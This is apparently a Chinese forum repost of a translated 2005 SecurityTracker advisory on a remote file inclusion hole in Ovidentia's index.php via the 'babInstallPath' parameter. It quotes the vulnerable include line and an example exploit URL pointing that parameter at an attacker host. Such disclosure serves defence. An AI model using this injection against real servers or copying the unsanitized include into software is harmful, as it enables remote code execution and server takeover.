[翻译]Ovidentia'index.php' 包含文件存在漏洞,遥远用户运行任意指
资料翻译: fpx[BCT]翻译网站: Bug.Center.Team [url]http://www.cnbct.org[/url]
SecurityTracker ID: 1014149
SecurityTracker URL: http:// securitytracker.com/id?1014149
CVE 叁考: GENERIC-MAP-NOMATCH
厂商网址: [url]www.ovidentia.org[/url]
日期: 2005 年6月 9 日
影响: 使用者经由网络执行任意代码
摘要: Status-x 报告了 Ovidentia 的一个漏洞。
遥远能在目标系统上运行任意指令。 'index.php'
脚本包含的'utilit/utilit.php' 脚本文件中的
'babInstallPath' 叁数过滤不严。遥远用户能提
交特殊构造的URL在目标系统运行任意PHP代码,
包括操作系统指令, 得到服务器权限。
漏洞代码:
$babSiteName = substr($babSiteName, 0, 30);
include_once "base.php";
include $babInstallPath."utilit/utilit.php"; <--- vuln
unset($BAB_SESS_LOGGED);
$babPhpSelf = substr($PHP_SELF,-strpos(strrev($PHP_SELF),'/'));
$babUrlScript = $babUrl.$babPhpSelf;
$babAddonsPath = $GLOBALS['babInstallPath']."addons/";
漏洞利用示范:
http://[target]/ovidentia/index.php?babInstallPath=http://[attacker]
页:
[1]